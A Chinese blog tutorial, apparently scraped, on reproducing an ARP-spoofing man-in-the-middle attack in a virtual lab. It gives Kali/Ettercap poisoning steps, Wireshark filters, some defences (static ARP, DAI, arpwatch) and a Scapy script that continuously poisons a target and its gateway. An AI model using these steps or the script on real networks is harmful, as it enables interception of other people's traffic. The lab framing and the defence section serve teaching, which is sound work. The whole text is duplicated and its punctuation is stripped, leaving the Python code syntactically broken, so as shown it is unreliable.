从零玩转ARP欺骗KaliEttercapWireshark实战中间人攻击网络安全的世界里ARP欺骗就像一场精心设计的魔术表演——攻击者悄无声息地篡改网络设备的通讯录让数据包错误地流向自己的口袋。不同于传统实验报告的刻板流程我们将用游戏化的方式带你亲手搭建这个魔术舞台。1. 环境搭建准备你的虚拟战场在开始这场网络攻防演练前我们需要配置好实验环境。就像游戏玩家需要选择装备一样这里的关键道具是两台虚拟机攻击主机Kali Linux 2023.3预装Ettercap和Wireshark靶机Windows 10/11建议关闭防火墙临时测试提示VMware或VirtualBox的网络模式请设置为NAT这能模拟最常见的家庭/办公室网络环境。验证网络连通性的几个基本命令# Kali中查看IP配置 ifconfig eth0 # Windows中查看IP配置 ipconfig /all # 双向ping测试 ping 靶机IP # 从Kali执行 ping 攻击机IP # 从Windows执行常见问题排查表症状可能原因解决方案无法互相ping通防火墙阻挡临时关闭Windows防火墙只能单向通信网络配置错误检查两台虚拟机是否同属一个子网延迟极高虚拟机资源不足为虚拟机分配更多CPU和内存2. ARP协议精要理解魔术的机关ARP地址解析协议是这场魔术的核心道具它负责将IP地址转换为MAC地址。正常流程是这样的主机A想与192.168.1.100通信广播发送ARP请求谁的IP是192.168.1.100目标主机回复我是192.168.1.100我的MAC是AA:BB:CC:DD:EE:FF主机A将这对映射存入ARP缓存表ARP欺骗的精妙之处在于无认证机制设备会无条件信任收到的ARP响应缓存覆盖新的ARP响应会自动覆盖旧的记录广播特性攻击者可以伪装成任何IP进行响应用Wireshark抓取的正常ARP交互No. Time Source Destination Protocol Info 1 0.000000 AA:BB:CC:DD:EE:FF Broadcast ARP Who has 192.168.1.100? 2 0.000123 11:22:33:44:55:66 AA:BB:CC:DD:EE:FF ARP 192.168.1.100 is at 11:22:33:44:55:663. 实战Ettercap图形化攻击演示Ettercap的GUI模式让攻击变得像玩策略游戏一样直观。跟着这些步骤操作启动Ettercap图形界面sudo ettercap -G在菜单栏依次操作Sniff→Unified sniffing→ 选择网卡(通常eth0)Hosts→Scan for hosts扫描网络设备Hosts→Hosts list查看发现的设备设置攻击目标在主机列表中选择网关IP → 点击Add to Target 1选择靶机IP → 点击Add to Target 2发起ARP欺骗攻击Mitm→ARP poisoning勾选Sniff remote connections点击OK开始攻击实时观察攻击效果# 在靶机上查看被污染的ARP表 arp -a # 预期输出示例 Internet Address Physical Address Type 192.168.1.1 00:11:22:33:44:55 dynamic # 实际应是攻击机的MAC4. Wireshark抓包分析解密攻击流量启动Wireshark监控网络流量重点关注这些特征sudo wireshark关键过滤表达式arp仅显示ARP协议流量eth.src 攻击机MAC追踪攻击机发出的帧ip.addr 靶机IP监控靶机相关通信典型的攻击流量模式攻击机持续发送ARP响应包告诉网关我是靶机IP我的MAC是攻击机的告诉靶机我是网关IP我的MAC是攻击机的正常通信被重定向靶机发送给网关的数据 → 实际流向攻击机网关发送给靶机的数据 → 实际流向攻击机网络异常表现靶机突然无法访问外网ping测试出现超时特定网站加载异常5. 防御策略构建你的网络安全护盾了解攻击手段后这些防御措施值得实施静态ARP绑定最有效方法# Windows中设置静态ARP条目 arp -s 网关IP 网关真实MAC # Linux中设置静态ARP条目 sudo arp -s 网关IP 网关真实MAC网络设备防护启用交换机的端口安全功能配置DHCP SnoopingDAI防护部署ARP防火墙软件监测手段# Linux下检测ARP异常 arpwatch -i eth0 # Windows下使用批处理定期检查 echo off arp -a current_arp.txt fc /b baseline_arp.txt current_arp.txt6. 进阶玩法Python实现ARP欺骗对于想深入理解原理的开发者可以用Scapy库手动构建攻击包from scapy.all import * import time def arp_spoof(target_ip, gateway_ip, iface): target_mac getmacbyip(target_ip) gateway_mac getmacbyip(gateway_ip) while True: # 欺骗靶机 send(ARP(op2, pdsttarget_ip, psrcgateway_ip, hwdsttarget_mac)) # 欺骗网关 send(ARP(op2, pdstgateway_ip, psrctarget_ip, hwdstgateway_mac)) time.sleep(2) # 使用示例 arp_spoof(192.168.1.100, 192.168.1.1, eth0)关键参数说明参数含义注意事项op2ARP响应类型1为请求2为响应pdst目标IP要欺骗的设备IPpsrc伪造的源IP假装是这个IP在响应hwdst目标MAC确保包送到正确设备在实际测试中我发现间隔2秒发送一次ARP响应能保持稳定的欺骗效果又不会产生过多网络噪音。这个脚本运行后可以配合Wireshark观察靶机ARP表的变化过程非常有助于理解协议工作原理。
告别枯燥实验报告:用Kali+Ettercap+Wireshark实战ARP欺骗,手把手教你复现中间人攻击
发布时间:2026/6/2 10:03:53
从零玩转ARP欺骗KaliEttercapWireshark实战中间人攻击网络安全的世界里ARP欺骗就像一场精心设计的魔术表演——攻击者悄无声息地篡改网络设备的通讯录让数据包错误地流向自己的口袋。不同于传统实验报告的刻板流程我们将用游戏化的方式带你亲手搭建这个魔术舞台。1. 环境搭建准备你的虚拟战场在开始这场网络攻防演练前我们需要配置好实验环境。就像游戏玩家需要选择装备一样这里的关键道具是两台虚拟机攻击主机Kali Linux 2023.3预装Ettercap和Wireshark靶机Windows 10/11建议关闭防火墙临时测试提示VMware或VirtualBox的网络模式请设置为NAT这能模拟最常见的家庭/办公室网络环境。验证网络连通性的几个基本命令# Kali中查看IP配置 ifconfig eth0 # Windows中查看IP配置 ipconfig /all # 双向ping测试 ping 靶机IP # 从Kali执行 ping 攻击机IP # 从Windows执行常见问题排查表症状可能原因解决方案无法互相ping通防火墙阻挡临时关闭Windows防火墙只能单向通信网络配置错误检查两台虚拟机是否同属一个子网延迟极高虚拟机资源不足为虚拟机分配更多CPU和内存2. ARP协议精要理解魔术的机关ARP地址解析协议是这场魔术的核心道具它负责将IP地址转换为MAC地址。正常流程是这样的主机A想与192.168.1.100通信广播发送ARP请求谁的IP是192.168.1.100目标主机回复我是192.168.1.100我的MAC是AA:BB:CC:DD:EE:FF主机A将这对映射存入ARP缓存表ARP欺骗的精妙之处在于无认证机制设备会无条件信任收到的ARP响应缓存覆盖新的ARP响应会自动覆盖旧的记录广播特性攻击者可以伪装成任何IP进行响应用Wireshark抓取的正常ARP交互No. Time Source Destination Protocol Info 1 0.000000 AA:BB:CC:DD:EE:FF Broadcast ARP Who has 192.168.1.100? 2 0.000123 11:22:33:44:55:66 AA:BB:CC:DD:EE:FF ARP 192.168.1.100 is at 11:22:33:44:55:663. 实战Ettercap图形化攻击演示Ettercap的GUI模式让攻击变得像玩策略游戏一样直观。跟着这些步骤操作启动Ettercap图形界面sudo ettercap -G在菜单栏依次操作Sniff→Unified sniffing→ 选择网卡(通常eth0)Hosts→Scan for hosts扫描网络设备Hosts→Hosts list查看发现的设备设置攻击目标在主机列表中选择网关IP → 点击Add to Target 1选择靶机IP → 点击Add to Target 2发起ARP欺骗攻击Mitm→ARP poisoning勾选Sniff remote connections点击OK开始攻击实时观察攻击效果# 在靶机上查看被污染的ARP表 arp -a # 预期输出示例 Internet Address Physical Address Type 192.168.1.1 00:11:22:33:44:55 dynamic # 实际应是攻击机的MAC4. Wireshark抓包分析解密攻击流量启动Wireshark监控网络流量重点关注这些特征sudo wireshark关键过滤表达式arp仅显示ARP协议流量eth.src 攻击机MAC追踪攻击机发出的帧ip.addr 靶机IP监控靶机相关通信典型的攻击流量模式攻击机持续发送ARP响应包告诉网关我是靶机IP我的MAC是攻击机的告诉靶机我是网关IP我的MAC是攻击机的正常通信被重定向靶机发送给网关的数据 → 实际流向攻击机网关发送给靶机的数据 → 实际流向攻击机网络异常表现靶机突然无法访问外网ping测试出现超时特定网站加载异常5. 防御策略构建你的网络安全护盾了解攻击手段后这些防御措施值得实施静态ARP绑定最有效方法# Windows中设置静态ARP条目 arp -s 网关IP 网关真实MAC # Linux中设置静态ARP条目 sudo arp -s 网关IP 网关真实MAC网络设备防护启用交换机的端口安全功能配置DHCP SnoopingDAI防护部署ARP防火墙软件监测手段# Linux下检测ARP异常 arpwatch -i eth0 # Windows下使用批处理定期检查 echo off arp -a current_arp.txt fc /b baseline_arp.txt current_arp.txt6. 进阶玩法Python实现ARP欺骗对于想深入理解原理的开发者可以用Scapy库手动构建攻击包from scapy.all import * import time def arp_spoof(target_ip, gateway_ip, iface): target_mac getmacbyip(target_ip) gateway_mac getmacbyip(gateway_ip) while True: # 欺骗靶机 send(ARP(op2, pdsttarget_ip, psrcgateway_ip, hwdsttarget_mac)) # 欺骗网关 send(ARP(op2, pdstgateway_ip, psrctarget_ip, hwdstgateway_mac)) time.sleep(2) # 使用示例 arp_spoof(192.168.1.100, 192.168.1.1, eth0)关键参数说明参数含义注意事项op2ARP响应类型1为请求2为响应pdst目标IP要欺骗的设备IPpsrc伪造的源IP假装是这个IP在响应hwdst目标MAC确保包送到正确设备在实际测试中我发现间隔2秒发送一次ARP响应能保持稳定的欺骗效果又不会产生过多网络噪音。这个脚本运行后可以配合Wireshark观察靶机ARP表的变化过程非常有助于理解协议工作原理。
)
)
)
